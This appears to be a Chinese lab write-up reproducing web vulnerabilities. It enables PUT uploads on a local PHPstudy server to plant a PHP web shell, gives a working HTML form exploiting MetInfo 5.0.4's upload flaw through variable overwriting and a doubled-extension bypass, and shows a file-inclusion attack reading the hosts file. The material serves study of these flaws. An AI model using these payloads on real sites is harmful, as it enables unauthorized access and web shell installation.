IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> PUT方法上传文件 -> 正文阅读

[PHP知识库]PUT方法上传文件

?

目录

要想开启PUT,需要修改PHPstudy的配置文件。

metinfov5.0.4

metinfov5.0.4的10.21更新


要想开启PUT,需要修改PHPstudy的配置文件。

?根据路径打开配置文件,启用模块,记得对修改的模块备份

启用模块

?添加目录

根据自己的路径修改,记得保存,重启服务 ,

可以通过BP抓取上传文件的包,对上传类型进行修改,也可通过kali自带的cadaver来实现

?通过help可以指定支持哪些命令使用?

lls是查看本机的文件,ls是查看服务器的文件,通过put上传一句话木马,使用蚁剑链接。

?蚁剑成功连接,

而目录下也有1.php?

metinfov5.0.4

?漏洞位置

http://192.168.40.137/MetInfo5.0.4/admin/include/uploadify.php

uploadify.php

看到包含"common.inc.php"? 查看

?看到在管理员权限一栏有SQL认证,但并未添加过滤,存在绕过。

文件上传类型也有限制?

可以采用双写绕过(pphphp)?

编写表单

<html>
<form enctype="multipart-data" method="post"
	name="myForm"
	action="http://192.168.40.137/MetInfo5.0.4/admin/include/uploadify.php?
	、、metinfo_admin_id=root&metinfo_admin_pass=root&met_admin_table=met_admin_table#&type=upfile&met_file_format=jpg|pphphp
">
<input name="Filedata" type="file" size=20>
<input type="submit" name="Submit" value="0.0">
</html>

metinfov5.0.4的10.21更新

基于面对代码,进行代码审计,利用工具对整个网站的代码进行一个扫描审计

看到可能存有文件包含漏洞,对源码进行一个访问。

可以看到 require_once $module,还有require_once '../include/module.php',对module.php进行查看。

找到$module,?在没有对$module传参的时候,直接返回一个404.html,最下面对$module给予了一个值,且文件开头又包含了另一个文件

进行访问

?看到cookei、post、get、三个传参方法,中间还有$$_request,? $_key是键,$value是值,

对该串代码进行测试

?访问:

看到输出了Feng_Blue

对$name进行修改

?在url中对name进行赋值,但源文件中并没有修改,发现在url传递的参数直接覆盖了源文件中的内容。

name=Feng_Blue

name被当成变量名,Feng_Blue为参数值,不传参就输出定义过的name,传参则就覆盖原文件内的name的值,是一个变量覆盖漏洞。

此时我们回到../adout/index/php

尝试替换带$module

?而此时发现,并没有覆盖掉$module,对源代码进行修改,尝试print一下这个$module,记得备份。

?保存源码后刷新

?弹出show.php,再进行赋值:

依旧回显show.php,说明对这个?$module初始化了。

?我们回头查看module.php

?当$fmodule不等于7的时候进行初始化,而我们需要让它等于7。因为$module再if分支。

尝试:

?成功

?查看:\windows\system32\drivers\etc\hosts

文件包含漏洞复现

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2021-10-23 12:16:55  更:2021-10-23 12:17:54 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/23 20:29:22-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码